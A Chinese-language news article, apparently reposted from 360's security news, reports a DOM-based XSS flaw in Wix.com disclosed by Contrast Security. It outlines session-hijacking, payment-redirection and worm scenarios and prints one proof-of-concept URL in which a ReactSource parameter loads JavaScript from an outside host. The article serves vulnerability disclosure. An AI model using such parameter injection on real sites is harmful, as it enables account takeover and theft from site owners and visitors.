Wix.com存在未及时修复的漏洞将数百万网站置于危险之中

Wix.com存在未及时修复的漏洞将数百万网站置于危险之中

黑客软件访客2021-10-11 21:23:008534A+A-

基于云的开发平台Wix.com被曝存在DOM based XSS漏洞,可被攻击者利用获取该平台下任意站点的完全控制权,Wix.com先前就宣称采用该平台的用户大约有8600万。该漏洞是由Contrast Security高级安全研究工程师Matt Austin公布的。只需要针对Wix平台的任意站点添加一个参数,攻击者就能加载其JS代码。到目前为止Wix.com尚未修复该漏洞。

Web主机云服务提供商Wix.com存在Dom型XSS漏洞,该漏洞可以让攻击者控制在该平台上托管的任何一个网站。

Contrast Security的高级安全研究员Matt Austin表示,“只需要在Wix上创建的网站上添加单个参数,攻击者可以让他们的恶意JavaScript代码在该网站上加载执行。”

Austin说,尽管早在十月份的时候就已经把漏洞信息向Wix通报,但是截止到本周三这个漏洞仍然没有被修复。Wix.com也没有对这个报告发表过任何回复。据Wix.com官方统计,在该平台共计8600万用户。

据OWASP报告显示,此漏洞不同于传统的XSS漏洞(payload存储于一个HTTP(S)请求的响应页面中),DOM型XSS漏洞通过客户端脚本修改用户浏览器中文档对象模型(DOM)环境,并且恶意代码会影响客户端代码的执行。

场景分析

Austin分析了2种反射DOM型XSS漏洞的攻击场景。其中一种是诱导Wix网站所有者点击一个恶意的URL链接。这个URL会加载一个精心构造的JavaScript代码劫持受害者浏览器的session信息。

随后攻击者可以侵占受害者的浏览器session,这样他就可以像原来的用户那样,执行任意的操作了。攻击者可以对受害者原先掌控着的Wix网站进行修改,例如向第三方提供网站管理员的权利,或渗透一个Wix电子商务站点来窃取信用卡号码。

Austin说,拥有Wix.com站点的管理员控制权限后,就能分发恶意软件,创建一个动态的、分布式的、基于浏览器的僵尸网络,窃取网络货币,并控制网站的内容和使用它的用户。

在Austin描述的第二个场景中,可以运用一个精心构造的URL,将用户诱导进入一个Wix网站。该URL通过一个DOM型的XSS攻击,将JavaScript加载到目标的Wix.com网站中。在某种情境中,通过浏览器的session信息,可以对一个Wix.com的粉丝网站进行修改,从而将音乐下载替换为恶意软件下载,或者将PayPal支付重新定向到第三方帐户。

在DOM XSS攻击的案例中,攻击者需要做的就是在服务器上布置恶意的JavaScript,并用一个URL指向它。例如:“http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com“。在这个例子中,根域名”http://matt4592.wixsite.com/music”后面嵌入了附加的“?ReactSource=http://m-austin.com”, 这为基于DOM的XSS攻击提供有效载荷创造了条件。

后记

Contrast Security表示,更糟糕的是,利用这种缺陷,网络罪犯可以对攻击进行扩张,把它变成一个蠕虫,从而在所有的Wix网站中传播,这将类似于2005年时臭名昭著的Samy蠕虫和MySpace蠕虫——被设计用来针对整个社交网站。

Austin说,前车之鉴告诉我们,想要接管托管在Wix的数以百万计的网站,其实并不需要花太长的时间。

来源:安全客(http://m.bobao.360.cn/news/detail/3714.html)

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 只酷两仪2022-05-31 15:05:49
  • .com网站中。在某种情境中,通过浏览器的session信息,可以对一个Wix.com的粉丝网站进行修改,从而将音乐下载替换为恶意软件下载,或者将PayPal支付重新定向到第三方帐户。在DOM XSS攻击的案例中,攻击者需要做的就是在服
  • 青迟橙柒2022-05-31 16:35:28
  • 在该平台上托管的任何一个网站。Contrast Security的高级安全研究员Matt Austin表示,“只需要在Wix上创建的网站上添加单个参数,攻击者可以让他们的恶意JavaScript代码在该网站上加载执行。”Austi
  • 语酌痞唇2022-05-31 15:03:49
  • 者将PayPal支付重新定向到第三方帐户。在DOM XSS攻击的案例中,攻击者需要做的就是在服务器上布置恶意的JavaScript,并用一个URL指向它。例如:“http://matt4592.wixsite.com/music?ReactSource=http://m-austin.co
  • 掩吻酒事2022-05-31 17:57:14
  • 行任意的操作了。攻击者可以对受害者原先掌控着的Wix网站进行修改,例如向第三方提供网站管理员的权利,或渗透一个Wix电子商务站点来窃取信用卡号码。Austin说,拥有Wix.com站点的管理员控制权限后,就能分发恶意软件,创建一个动态的、分布式的、基于浏览器的僵尸网络,窃取网络货

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理